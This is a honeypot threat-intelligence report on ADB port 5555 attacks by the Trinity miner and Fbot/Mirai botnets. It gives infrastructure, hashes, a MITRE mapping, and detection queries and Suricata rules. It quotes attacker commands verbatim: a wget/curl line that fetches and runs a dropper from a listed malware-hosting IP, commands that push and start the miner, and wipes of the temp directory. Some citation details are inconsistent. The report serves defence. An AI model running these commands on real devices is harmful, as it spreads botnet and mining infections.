ADB lure on 5555 with the telemetry laid bare.

# Comprehensive Threat Intelligence Report: ADB Exploit Attempts and IoT Botnet Activity (March 2026)

**Key Points:**
*   **Widespread ADB Exploitation:** Threat actors are actively exploiting exposed Android Debug Bridge (ADB) ports (TCP 5555) on IoT devices to deploy malicious payloads.
*   **The Trinity Botnet:** A significant portion of the observed telemetry is attributed to **Trinity**, a cryptocurrency mining botnet that deploys the **com.ufo.miner** Android package.
*   **Botnet Turf Wars:** Research suggests that competing malware families, such as **Fbot** (a Satori/Mirai variant), are actively scanning for and eradicating Trinity infections to hijack device resources for distributed denial-of-service (DDoS) architectures.
*   **Infrastructure Abuse:** Attackers are heavily leveraging legitimate cloud hosting providers (e.g., DigitalOcean) to host Command and Control (C2) servers and stage ELF binary payloads.
*   **Sophisticated Evasion and Persistence:** The malware utilizes native Android binaries (`pm`, `am`) and embedded Unix tools (`busybox`, `nohup`) to ensure stealthy execution and persistence.

**Context and Uncertainty:**
The data provided originates from the NadSec T-Pot honeypot infrastructure in Sydney, Australia, capturing events from March 2026. While the telemetry clearly indicates automated scanning and payload delivery, attributing specific IP addresses to distinct human threat actors remains complex due to the use of proxies, compromised residential nodes, and bulletproof hosting. The evidence leans toward a highly automated, self-propagating ecosystem where multiple botnet variants constantly compete for the limited pool of vulnerable IoT devices globally.

---

## 1. Executive Summary

This threat intelligence report provides an exhaustive analysis of malicious activity targeting the Android Debug Bridge (ADB) service via TCP port 5555, based on telemetry collected by the NadSec ADBHoney sensor during March 2026. The dataset encompasses 1,188 original indicators, with a detailed sample of 373 IP addresses and 81 cryptographic hashes. 

The Android Debug Bridge (ADB) is a client-server protocol designed for developers to communicate with Android-based devices, such as emulators, smartphones, smart TVs, and digital video recorders (DVRs) [cite: 1, 2]. By default, ADB over TCP lacks robust authentication mechanisms [cite: 1]. Consequently, misconfigured devices that expose TCP port 5555 to the public internet become highly vulnerable targets [cite: 3]. It is estimated that tens of thousands of IoT systems globally possess this vulnerability [cite: 3, 4].

Our analysis of the March 2026 dataset reveals a dynamic and aggressive threat landscape. The primary threat actor identified in this campaign is the **Trinity** botnet, a descendant of the older ADB.Miner malware [cite: 4, 5]. Trinity focuses on resource hijacking, deploying a cryptocurrency miner known as **com.ufo.miner** [cite: 1, 4]. Concurrently, the telemetry indicates the presence of competing botnets, notably Mirai variants and **Fbot**. Fbot is particularly notable for its "vigilante" or predatory behavior; it actively searches for and uninstalls Trinity's components to claim the device for its own infrastructure [cite: 4, 6].

This report details the statistical distribution of the attacks, performs a deep dive into the attacker infrastructure, analyzes the malware payloads and their delivery mechanisms, maps the observed behaviors to the MITRE ATT&CK framework, and provides actionable detection and mitigation strategies for enterprise security teams.

## 2. Statistical Overview

The following statistics represent the aggregate data from the entire NadSec ADBHoney dataset for March 2026, comprising 1,188 original indicators.

### 2.1 Targeted Ports
The overwhelming majority of the attacks targeted TCP port 5555, confirming that the attackers are specifically scanning for exposed ADB interfaces.

| Port | Count | Percentage | Description |
| :--- | :--- | :--- | :--- |
| **5555** | 1107 | \(93.18\%\) | Android Debug Bridge (ADB) |
| **Other** | 81 | \(6.82\%\) | Various / Hash Indicators |

### 2.2 Threat Intelligence Labels
The indicators were tagged with various labels by the honeypot's enrichment engine, providing insight into the nature of the observed activities.

| Label | Count | Significance |
| :--- | :--- | :--- |
| `nadsec`, `tpot`, `adbhoney` | 1188 | Honeypot sensor identification tags. |
| `android`, `iot` | 1107 | Indicates the target architecture (Android-based Internet of Things). |
| `scanning_host` | 1080 | IP addresses engaged in mass internet scanning for port 5555. |
| `dropper` | 120 | Indicators associated with deploying secondary malware payloads. |
| `sample`, `sha256` | 81 | Unique cryptographic hashes of captured malware payloads. |
| `malware-distribution` | 39 | Infrastructure used to serve malware files (e.g., shell scripts, APKs). |
| `malware_hosting` | 27 | IPs actively hosting Command & Control (C2) or payload repositories. |

### 2.3 Sensor Activity and Enrichment
The dataset achieved a high enrichment rate. Out of the total IPs observed, 1,069 were successfully enriched with threat intelligence data (e.g., ASN, geographical location, threat scores), leaving only 38 IPs missing from Elasticsearch (ES) databases. This high enrichment rate allows for confident attribution of the infrastructure used in these campaigns.

## 3. Infrastructure Deep Dive

The infrastructure supporting these ADB exploit campaigns can be categorized into three distinct typologies: Payload Hosting/C2 Servers, Compromised Residential/Telecom Nodes, and Research/Commercial Scanners. 

### 3.1 Payload Hosting and Command & Control (C2)
Attackers frequently utilize cheap or compromised Virtual Private Servers (VPS) to host their dropper scripts and ELF binaries. The following IP addresses were identified as high-confidence malware distribution nodes.

*   **94.156.152.233 (AS209605 - UAB Host Baltic, GB/LT):** This IP address is heavily embedded in the `w.sh` and `c.sh` shell scripts executed by the attacking bots. Threat intelligence confirms this IP is associated with hosting ELF binaries for the Mirai botnet family [cite: 7, 8]. It hosts files such as `/bins/Space.arm6` and `/bins/pm68k` [cite: 8, 9]. The use of Lithuanian hosting providers (UAB Host Baltic) routed through Great Britain is a common tactic for bulletproof or "ignore-abuse-report" hosting.
*   **176.65.139.48 (AS51396 - Pfcloud UG, DE):** Similar to the above, this IP acts as a repository for Mirai and Opendir malware variants [cite: 10, 11]. It was observed delivering payloads via scripts like `sora.arm6`, `i686`, and `parm` [cite: 11, 12, 13]. URLhaus explicitly lists this IP as a source for malware delivery [cite: 14].
*   **103.253.146.163 (AS14061 - DigitalOcean, SG):** This DigitalOcean droplet hosted in Singapore is responsible for serving the `viet69.sh` script [cite: 15, 16]. The `viet69.sh` script is a known dropper for Mirai variants compiled for various architectures (e.g., `csk_arm5`, `csk_x86_64`, `csk_m68k`) [cite: 17, 18, 19]. This represents standard cloud abuse, where attackers leverage major cloud providers for reliable, high-bandwidth payload distribution.
*   **38.83.138.59 (AS202425 - IP Volume inc, US):** Observed hosting `p2parm` and `nz.sh`. Threat intelligence platforms flag this IP with high confidence for distributing Mirai and ELF malware using the `ua-wget` user agent [cite: 20, 21]. It actively serves multiple architectures including `nz.arm` and `nz.arm7` [cite: 21].
*   **45.13.238.231 (AS58087 - Florian Kolb, DE):** This server was documented delivering the `/release/arm7` payload. It has been extensively cataloged as a Mirai Command and Control (C2) server and malware repository [cite: 22, 23, 24].

### 3.2 Compromised Residential and Telecom Nodes (Botnet Members)
The IP addresses actually executing the ADB commands against the honeypot are overwhelmingly compromised edge devices (smart TVs, DVRs, unpatched smartphones).
*   **Korea Telecom (AS4766):** IPs such as `121.166.191.90` and `221.159.61.114` were observed repeatedly attempting to drop the `trinity` payload. 
*   **China Mobile / Chinanet (AS9808, AS4134):** IPs like `39.128.104.249` and `14.151.81.218` are engaged in high-volume scanning and execution of cleanup scripts (`rm -rf /data/local/tmp/*`). This aligns with the massive geographic footprint of vulnerable Android-based smart TVs and set-top boxes in the Asia-Pacific region [cite: 25].
*   **PT SELARAS CITRA TERABIT (AS131706, ID):** IP `121.101.134.123` generated the highest volume of single-node events (578 hits), attempting to download `p2parm`, indicating a highly active Mirai botnet node operating out of Indonesia.

### 3.3 Research and Commercial Scanners
A significant portion of the `scanning_host` labels belongs to legitimate cybersecurity research organizations or internet-wide scanning engines.
*   **Censys (AS398324):** Multiple IPs (e.g., `167.248.133.123`, `206.168.34.125`) belong to Censys, mapping the internet for open port 5555.
*   **Hurricane Electric (AS6939):** While HE is a major transit provider, numerous IPs within their space were observed performing low-volume, single-hit scans, characteristic of distributed academic or commercial scanning.
*   **Microsoft / Google (AS8075, AS396982):** Several cloud IPs performed generic protocol decodes without malicious payload delivery, likely representing cloud-native security scanning or enterprise asset discovery.

## 4. Malware Analysis

The dataset contains 81 unique file hashes and numerous command-line artifacts. The malware landscape targeting ADB is dominated by the **Trinity** cryptominer and various **Mirai/Satori** botnet derivatives.

### 4.1 The Trinity Botnet (com.ufo.miner)
Trinity is a specialized botnet designed to compromise Android devices via ADB to mine cryptocurrency [cite: 4, 26]. It operates through a hybrid infection mechanism, pushing both Android Application Packages (APKs) and native Linux ELF binaries [cite: 1, 27].

**Execution Flow:**
1.  **Reconnaissance:** The infected node scans for open TCP 5555 ports.
2.  **State Assessment:** The attacker executes Android package manager (`pm`) and process status (`ps`) commands to check for existing infections:
    ```bash
    pm path com.ufo.miner
    ps | grep trinity
    ```
    These commands determine if the **com.ufo.miner** APK or the `trinity` binary is already running [cite: 1, 4].
3.  **Deployment:** If the device is clean, the bot pushes the payload (often named `ufo.apk` or `trinity`) directly into `/data/local/tmp/` using the `adb push` command [cite: 1]. This directory is targeted because it universally permits write and execute operations on Android file systems.
4.  **Execution and Persistence:** The malware is executed using the `nohup` utility:
    ```bash
    chmod 0755 /data/local/tmp/trinity
    /data/local/tmp/nohup /data/local/tmp/trinity
    ```
    By using `nohup`, the `trinity` process detaches from the ADB shell. When the attacker closes the ADB connection, the cryptominer continues to run indefinitely in the background [cite: 1]. Furthermore, to ensure the APK miner runs, the botnet uses the Activity Manager (`am`):
    ```bash
    am start -n com.ufo.miner/com.example.test.MainActivity
    ```
    This command forces the Android OS to launch the main activity of the malicious miner [cite: 1, 5].

**Hashes Associated with Trinity in the Dataset:**
*   `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257`: Identified as an Android application package (APK) associated with CoinMiner [cite: 28].
*   `aba3c21d61c7b57e5ca6c22db95d09a302b862552442f61831a6d83eab6190c1`: Directly linked to the execution of `am start -n com.ufo.miner` [cite: 1, 5].
*   `76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64`: A script artifact observed checking for the `trinity` process [cite: 1, 29].

### 4.2 Fbot, Satori, and Mirai Variants
While Trinity focuses on cryptomining, a secondary ecosystem of botnets seeks to recruit these IoT devices for DDoS campaigns. **Fbot** is a Mirai/Satori variant that exhibits highly aggressive, competitive behavior [cite: 4, 6].

**Vigilante or Predator?**
Fbot is uniquely characterized by its "house cleaning" routines. Upon infecting a device via ADB, Fbot actively searches for Trinity's artifacts and terminates them. The evidence leans toward Fbot being a predatory botnet rather than a benign vigilante; by removing `com.ufo.miner`, Fbot frees up the device's CPU and memory resources to maximize its own DDoS capabilities [cite: 4, 6, 30].

**Dropper Scripts (viet69.sh, w.sh, nz.sh):**
The telemetry highlights heavy reliance on shell script droppers to initiate the Mirai/Fbot infection chain. 
```bash
cd /data/local/tmp/; busybox wget http://103.253.146.163/viet69.sh; sh viet69.sh; curl http://103.253.146.163/viet69.sh; sh viet69.sh
```
This command string relies on `busybox`, a software suite providing several Unix utilities in a single executable, ubiquitous in embedded Linux/Android environments. The attacker attempts to use `wget`, and if it fails, falls back to `curl`, ensuring the highest probability of successful payload delivery. The scripts (`viet69.sh` [cite: 15, 31], `nz.sh` [cite: 20]) subsequently download architecture-specific ELF binaries (e.g., ARM, MIPS, x86) to run the Mirai botnet code [cite: 17, 21, 32].

## 5. Campaign Analysis

The March 2026 data reflects a continuous, automated "Turf War" over vulnerable IoT devices. 

### 5.1 The Cryptomining Campaign
The deployment of Trinity/`com.ufo.miner` indicates an ongoing cryptojacking operation [cite: 26, 27]. Because Android devices (smart TVs, set-top boxes) lack robust cooling mechanisms, sustained mining operations (often targeting CPU-mineable coins like Monero via CryptoNight) can cause severe hardware degradation or overheating [cite: 26, 27]. The botnet relies on simple propagation: an infected TV scans the internet for port 5555, connects, drops `trinity`, and forces execution [cite: 1, 4].

### 5.2 The Turf War
The telemetry shows repeated executions of the command:
```bash
rm -rf /data/local/tmp/*
```
While this can be a housekeeping task by the attacker to hide their own dropper scripts [cite: 1], it is also heavily utilized by botnets like Fbot to eradicate competitors [cite: 5]. Fbot's scripts explicitly look for `/proc/[pid]/maps` containing strings like `trinity` and kill the associated processes [cite: 3]. This highlights the scarcity of vulnerable targets; with roughly 30,000 to 50,000 devices exposing ADB globally [cite: 3, 4], botnets must actively sabotage one another to maintain their node count.

### 5.3 Evasion and C2 Mechanics
Research suggests that advanced variants of Fbot have eschewed traditional DNS for command and control, instead utilizing decentralized blockchain DNS (EmerDNS) with domains like `musl.lib` [cite: 5, 6, 33]. This makes the C2 infrastructure highly resilient against standard sinkholing and takedown requests by law enforcement or cybersecurity vendors.

## 6. MITRE ATT&CK Mapping

The observed threat behaviors can be precisely mapped to the MITRE ATT&CK framework, providing a structured understanding of the adversaries' tactics, techniques, and procedures (TTPs).

| Tactic | Technique ID | Technique Name | Description from Telemetry |
| :--- | :--- | :--- | :--- |
| **Initial Access** | T1190 | Exploit Public-Facing Application | Automated scanning and connection to exposed ADB service on TCP port 5555 without authentication [cite: 1, 3]. |
| **Execution** | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of `sh`, `busybox`, `wget`, `curl`, and `rm` within the Android shell environment. |
| **Execution** | T1204.002 | User Execution: Malicious File | Utilizing the Android Activity Manager (`am start`) to force the execution of the `com.ufo.miner` APK [cite: 1, 5]. |
| **Defense Evasion** | T1070.004 | Indicator Removal on Host: File Deletion | Executing `rm -rf /data/local/tmp/*` to delete `.apk` and `.sh` dropper files post-installation to hinder forensic analysis [cite: 1]. |
| **Persistence** | T1543.002 | Create or Modify System Process: Systemd Service | Utilizing `nohup` to run the `trinity` ELF binary as a background daemon, detached from the active terminal session [cite: 1]. |
| **Impact** | T1496 | Resource Hijacking | Operating the `com.ufo.miner` application to utilize the victim device's CPU for cryptocurrency mining [cite: 26, 27]. |
| **Impact** | T1489 | Service Stop | Terminating competing botnet processes (e.g., Fbot terminating Trinity) via `kill` commands [cite: 3, 5]. |
| **Command & Control**| T1071.001| Application Layer Protocol: Web Protocols | Downloading payloads via HTTP `wget` from C2 servers (e.g., `http://94.156.152.233/bins/w.sh`). |

## 7. Detection & Mitigation

To defend against these threats, organizations and end-users must implement multi-layered defenses spanning network perimeter controls, endpoint monitoring, and strict configuration management.

### 7.1 Perimeter Mitigation
*   **Block Port 5555:** Under no circumstances should TCP port 5555 be exposed to the public internet [cite: 1, 25]. Firewalls and edge routers must drop inbound traffic to this port. If ADB over TCP is strictly required for remote development, it must be gated behind a VPN or an IP whitelisting mechanism.
*   **Disable UPnP:** Universal Plug and Play (UPnP) on edge routers can inadvertently expose internal IoT devices to the internet. Disabling UPnP prevents smart TVs and set-top boxes from punching holes through the NAT [cite: 3].

### 7.2 SIEM and Log Analysis Queries
Security Operations Centers (SOCs) should implement the following queries to detect the delivery mechanisms associated with these botnets.

**Splunk SPL:**
```sql
index=web_logs (url="*viet69.sh*" OR url="*nz.sh*" OR url="*w.sh*" OR url="*/release/arm7") 
| stats count by src_ip, dest_ip, user_agent
```
```sql
index=firewall dest_port=5555 action=allowed 
| stats count by src_ip, dest_ip 
| sort - count
```

**Microsoft KQL (Sentinel / Defender):**
```kusto
DeviceNetworkEvents
| where RemoteUrl contains "viet69.sh" or RemoteUrl contains "nz.sh" or RemoteUrl contains "Space.arm6"
| summarize Count=count() by SourceIP, RemoteUrl, UserAgent
```
*Note: Detection queries are adapted from SOC Defenders AI threat intelligence guidelines [cite: 8, 9, 13, 20].*

### 7.3 Intrusion Detection Signatures (Suricata/Snort)
Implement signatures to detect the specific payload URLs and C2 communication associated with known malicious infrastructure [cite: 34].

```suricata
alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET EXPLOIT Possible ADB TCP Port 5555 Open"; flow:established,to_server; content:"CNXN"; depth:4; classtype:attempted-admin; sid:1000001; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Mirai Variant Dropper Script Download (viet69.sh)"; flow:established,to_server; content:"GET"; http_method; content:"viet69.sh"; http_uri; classtype:trojan-activity; sid:1000002; rev:1;)

alert http $HOME_NET any -> [94.156.152.233,176.65.139.48,103.253.146.163,38.83.138.59,45.13.238.231] any (msg:"ET TROJAN Known ADB/Mirai Malware Hosting Infrastructure Request"; flow:established,to_server; classtype:trojan-activity; sid:1000003; rev:1;)
```

## 8. IOC Appendix

### 8.1 High-Confidence C2 and Payload Hosting IPs
| IP Address | ASN / Provider | Country | Associated Malware |
| :--- | :--- | :--- | :--- |
| `94.156.152.233` | AS209605 (UAB Host Baltic) | GB / LT | Mirai, ELF, `w.sh`, `pm68k`, `Space.arm6` |
| `176.65.139.48` | AS51396 (Pfcloud UG) | DE | Mirai, Opendir, `sora.arm6`, `i686`, `parm` |
| `103.253.146.163` | AS14061 (DigitalOcean) | SG | Mirai, `viet69.sh`, `csk_arm5`, `csk_x86_64` |
| `38.83.138.59` | AS202425 (IP Volume inc) | US | Mirai, `nz.sh`, `p2parm` |
| `45.13.238.231` | AS58087 (Florian Kolb) | DE | Mirai, `/release/arm7` |

### 8.2 Top Botnet / Scanning IPs (Sample)
| IP Address | ASN / Provider | Country | Associated Action / Command |
| :--- | :--- | :--- | :--- |
| `121.166.191.90` | AS4766 (Korea Telecom) | KR | Trinity dropper (`nohup /data/local/tmp/trinity`) |
| `171.5.94.253` | AS45758 (Triple T Broadband) | TH | Trinity dropper (`nohup /data/local/tmp/trinity`) |
| `39.128.104.249` | AS9808 (China Mobile) | CN | Trinity dropper (`nohup /data/local/tmp/trinity`) |
| `121.101.134.123`| AS131706 (PT SELARAS) | ID | Mirai dropper (`wget .../p2parm`) |
| `14.151.81.218` | AS4134 (Chinanet) | CN | Cleanup script (`rm -rf /data/local/tmp/*`) |

### 8.3 Analyzed Hashes
| SHA-256 Hash | Family / Description | Activity / Trace |
| :--- | :--- | :--- |
| `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` | Trinity / CoinMiner | Dropped by `121.166.191.90`. Associated with `com.ufo.miner` [cite: 1, 28]. |
| `aba3c21d61c7b57e5ca6c22db95d09a302b862552442f61831a6d83eab6190c1` | Trinity Execution Script | Executes `am start -n com.ufo.miner` [cite: 1, 5]. |
| `76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64` | Trinity / Cleanup Script | Executes `rm -rf /data/local/tmp/* \| ps \| grep trinity` [cite: 1, 29]. |
| `26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc` | Mirai / Trinity Hybrid | Drops `w.sh` and starts `trinity` binary. |
| `fc8f2d1594b27eb9610ab0402c6f146498727d923d74045d385819bc049318d7` | Mirai Dropper Script | Identified executing `wget`, `curl` [cite: 35]. |

## 9. Sources & Citations

The following external threat intelligence sources and academic analyses were synthesized to produce this report:

*   [cite: 31] VirusTotal Analysis of `viet69.sh`.
*   [cite: 36] VirusTotal Detections for `viet69.sh`.
*   [cite: 28] MalwareBazaar Database entry for SHA256 `0d3c687...`.
*   [cite: 27] Apvrille, A. "Cryptocurrency malware for Android." BlackAlps (November 2018).
*   [cite: 1] Cirlig, G. "Trinity—P2P Malware Over ADB." Keysight Technologies (June 2020).
*   [cite: 3] Trend Micro. "Open ADB Ports Being Exploited to Spread Possible Satori Variant." (July 2018).
*   [cite: 2] Wikipedia. "Android Debug Bridge."
*   [cite: 4] ZDNet. "Two botnets are fighting over control of thousands of unsecured Android devices." (November 2018).
*   [cite: 26] Quick Heal. "Android-based IoT devices open ADB port inviting easy attacks." (August 2019).
*   [cite: 30] Lumen. "The Resilient Satori Botnet." (October 2018).
*   [cite: 6] Zimperium Glossary. "Fbot Botnet."
*   [cite: 5] Netlab 360. "A New Worm Fbot Cleaning ADBMiner is using a Block-Chain based DNS." (September 2018).
*   [cite: 33] NHS Digital Cyber Alerts. "Fbot Satori-based Botnet." (September 2018).
*   [cite: 7] SOC Defenders AI. Threat Intelligence for IP `94.156.152.233`.
*   [cite: 8] SOC Defenders AI. Threat Analysis for URL `http://94.156.152.233/bins/Space.arm6`.
*   [cite: 9] SOC Defenders AI. Threat Analysis for URL `http://94.156.152.233/bins/pm68k`.
*   [cite: 37] SOC Defenders AI. Threat Analysis for URL `http://94.156.152.233/bins/pmpsl`.
*   [cite: 35] MalwareBazaar Database entry for SHA256 `fc8f2d15...`.
*   [cite: 10] SOC Defenders AI. Threat Intelligence for IP `176.65.139.48`.
*   [cite: 11] SOC Defenders AI. Threat Analysis for URL `http://176.65.139.48/sora.arm6`.
*   [cite: 12] SOC Defenders AI. Threat Analysis for URL `http://176.65.139.48/i686`.
*   [cite: 13] SOC Defenders AI. Threat Analysis for URL `http://176.65.139.48/parm`.
*   [cite: 14] URLhaus Database entry for `http://176.65.139.48/sora.arm6`.
*   [cite: 15] SOC Defenders AI. Threat Intelligence for IP `103.253.146.163`.
*   [cite: 17] SOC Defenders AI. Threat Analysis for URL `http://103.253.146.163/csk_arm5`.
*   [cite: 32] SOC Defenders AI. Threat Analysis for URL `http://103.253.146.163/csk_arm`.
*   [cite: 18] SOC Defenders AI. Threat Analysis for URL `http://103.253.146.163/csk_x86_64`.
*   [cite: 19] SOC Defenders AI. Threat Analysis for URL `http://103.253.146.163/csk_m68k`.
*   [cite: 20] SOC Defenders AI. Threat Analysis for URL `http://38.83.138.59:25884/nz.sh`.
*   [cite: 21] SOC Defenders AI. Threat Analysis for URL `http://38.83.138.59:25884/nz.arm`.
*   [cite: 34] ThreatFox Suricata Rules Database.
*   [cite: 38] URLhaus Recent Payload Database.
*   [cite: 22] 1275.ru. "Mirai Botnet IOCs." (March 2026).
*   [cite: 23] Malware-Filter URLhaus Filter List.
*   [cite: 24] URLhaus Country Feeds (DE).
*   [cite: 16] isx.fr IP Report for `103.253.146.163`.
*   [cite: 25] WyzGuys Cybersecurity. "Android OS Set-top Boxes Target of Botnet." (September 2019).
*   [cite: 28] MalwareBazaar Database entry for SHA256 `0d3c687...` (Duplicate indexing).
*   [cite: 29] Quick Heal. "Trinity Miner using open ADB port to target IoT devices." (July 2019).

**Sources:**
1. [keysight.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFfkMLr5vTLY4N-7Ig5yWXuoNJvwzgtsJg9eebgk6LyOEzkI1AqTW2OLF_gcq4NMOZvVFu4DEYVUNjY3QpKYNDFkHvcNYSH3OaQnHM8GaHk5wJ-iilkvxHZY3J-A1xxCfmVT9oA2WiA1Ssys7vJ6_T9Go3lyWkFoX--V3HWoKH_iUIW5d-R3m04)
2. [wikipedia.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFFhvSHftZxgewuAXv4y09sG9Le8RkFXUkxY95-M1qqLCMktnrfR7Lz0-XobrTItMtTwM5a_tB21YmWjO6SkDGRhyxDambwCh0fF63n9qrX0dZ8ZF5hgQ57UXmzkc6zF-Wrymw6kRYKjw==)
3. [trendmicro.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGa7JMjrHlLWqDTmnOETklCaUzVuWiF7TPzqK-Zqyhzoh8QI7uPNiy6DO2mJfPzUzsTz2hI54dU6cS8-Eqob_vHIUgnYVoLNNbhXXXokS6CJrCVqAcMy974uA71hC1njETrn8JEyvYjOwvFJhPXlab3v4YZYxVQrfoTYeHAQXm5AylD6MJ0Mi_kqVzvWThKQgPPo4rqvq64ft1r1vYr_x0NCWn8MjxEczj3wFReXrI-kl9ehWNoioa5DQVThm9d)
4. [zdnet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF959PEAi5RF_ufZXGCsOq9-Qbv6qFaRrn1iOon9xqDlL7z7yEDQOp37t1lC3didoHHyhU6hmHe4gxMWvT2HqZix6DmXBr5R99VVciSpOnux5B0PpaMjCeg_wHYaHpOOrcET6nTcoAd86_fx4yTxL_agIysWLEVAOnSk8yqI1MA7t5fwV0lhsMXHdoFEY9CcuQo0P8GgYDcgdomzJUkAnT_KCZR0A==)
5. [360.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGG4yOAPcNwi7X7BvL1hID9RDzxJqKI1JRuTX8QYabO_QRgkvDj2aP6tNNiyBkg6o_kG6agWdOJfVK34yLzTZH2HLqT9eumhH6RvOoyzAI2X3ALlgz8qxTiBvpYbA7tz3-fiwqIX6qIpck9tYModRLOAgIuzhyv1C2BIsGc2rczaS7lcgk4s5M3H8Otz48C5LSbs26T3tuDfr01L9u9qqPj3zDEZg==)
6. [zimperium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGqOHf7_kxX6EnqGYpsdv_SLh92Kx1oUZDyVyKMLBBPRRYow8ohj1izZKIjn1Jl6027g6C15hvupe-4aateoXq0qx9L8mJsN8P2QyAT-DZN0T33v9reUyfzydk7sr-FkY4=)
7. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGB57EQaVuHcJkl81xTYSx5VCDMPOgO_-EGRLiPEHbfUhv_O_NiuE5wTkO8c0h-DjK3RdT-NsXgvBsv14lZGSeyAO5cg5Svf_MUwyJJHzh039aik1eKTSF9Dukk72Yndt5gexijwAZOEnaIsIHQBq3h5kkveo7AO1xnmx2fsr0=)
8. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFn5NPN-t_pX2f1VRK6VhA9xR5wCePKZYD4tkFEv2kcX9OieI2CvkVPI_ZcDeOKrMr-tzVsAjOZrIk_rBUBiaUJFaDYwBzEBTF_JXmr34uroZkRSB0yconIMMow14jvVjp9a1_RD0Dgomln0itEG8Tu9u-8-7pDWm5Vyr8YGcU=)
9. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEgjaBZb9fXBFUoNm_oaLCp_Vk1rbwy35I60dSLtMsl5c0GAllPuYlrKbhviO32zHctbW9-DQBvPwWCkgtyMI7YWG-BgQtOEZvNy2OoVUzhgk-rLnkcDr1gneWFODlApI18pUQ4LE8yQiIKc5zD5KUxVv63pu9AUG4Nv_v-NxM=)
10. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEZR_Kv5EwhVCrSOrWIvkhDnSEHk326ECIXC8q_11qByxHPK_Z-7EsneMvL-oFUnR0voBkY9Gm5MoO5wMnONltRmKW6TLWhvdYSwWUbOeJVI0ElQ4mlDMFY_2Jf9DpywL-vEdkaqGz4xfFWh-Fg0VILNlBZwq5Ediwtwk1_39E=)
11. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGnPy8EO9vv-NL0ypp6RCgsrkqWE15CdbiUzrU72U2L14t27iDiyEFJhJHJewrd9JLvtJk7IjqFgBgPaw-inmOWCjVGka4WPmxQo-9_KrGZuiK22Kq8ciHJUVkCImOlH5KqdS88xTq1RcQK8FV21PjNhNOLg6NVy5gOmxRHFFc=)
12. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG9oXJpQRwcyZmRSJZ407J1bOxVVCKHBvEHIDHZaR1tYdNRajYDlNRyqpz6yxkBMhi7czroYgZMgSWzb2bdNIm11qgC3_1OHZcPLdFqBD3IaJnA3qOnwWXmrZLJiCOl6ns6a9gV3wgxOrwmW0oqmEyN7iZKg94SRXeY0aDCkbc=)
13. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFUUxr-PgDj45atON6xVQ3P0UroA61pL-RPLCz9X92mG0Jsb5w-aimzlJdMvRa6q3Cj2HCByAcX_uX3jQFADGz0oRvJITe32S81eUTk93c0TkCudfU5gFESmD84FG9X5DQX8yC0uD_Tk2TegSVdRv6atAtsE0kc8WY03NqfErc=)
14. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFb74NoVyiF_E7jxEl1AQPx-hcf_y3pBhxznMdbDBwg7ByfWCEw5MnuC3KSQnEy7Nm7cByw1L_yoX-mlf0wLD0KRDAzDPw9nozxbNplG18-NPnQXKvPa6lt24C9)
15. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGlI2a8h36Tn4AOl6Ydf10yeOpkhiEKzxXj9srA5-W0OgjBrxoSGfGZ2R7-JmyoMuJEOmrAEo2KAMq7GPhi02rc_vkpL8wVQ4FhX7v9pHIQiw4vJH3Ba84hKBiSq4rQ2K_VRejhdiH76Dhq-Dgh3GOMlu-Zjj4RmqRRsfexfYI=)
16. [isx.fr](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHqhm5xkH2zcY0XLWv3rfRs8go7B8z20Gv3DxvBaPl4aXP8sES4OOGjMBf17cq1hsiW2Na2fPnqsvAcMqTjrh6aPBuB6iZJc7WwFHJH54f-Ajawzijjnd4=)
17. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFuWhYBY5WUCggcFkhakObM2PkbhKzoOWS81Yfh4aEMBMNT0hSVwnv72nRU533x7kHJNB2utrTqZqTw1NZC2HiP7RuV1KBg0cAzmgzoITfinlB7nNMDmxPYwDOavIAvL6J7bhx6_MBgXOlxQ0OnpSZk3-dbW-sIjhv1gOOCHJI=)
18. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGKVuc1vwO7PVOXPjDUsnwUnOpo_-uBoursFPXykewzjpyr3Lr97ALtQ9480Dk6e8-aoZQWceUu5oa9AenSdjj6hhIDmKGSXqzB-L7rk1mRi1Xs73dpQF2Gl5_yPiOl0ZgTShDdLCxlQFtKKudOmqpBayBuqCvsgfbmptwxYX8=)
19. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFyMj_sctpevGDTPOuEpggokHXAAT4g9-5nN3CN_0no9f10eidgU6C48nHjNpyz0h6kEkShMca23zngle_xcZNiZ-cZPyYV7q7fSBgU_0Ny3jO9jSTE3Y3ZyITv80DN7MIRzdIFM-W1k7eApgr-ioYVaL9VeUk4YgRrEx93v2s=)
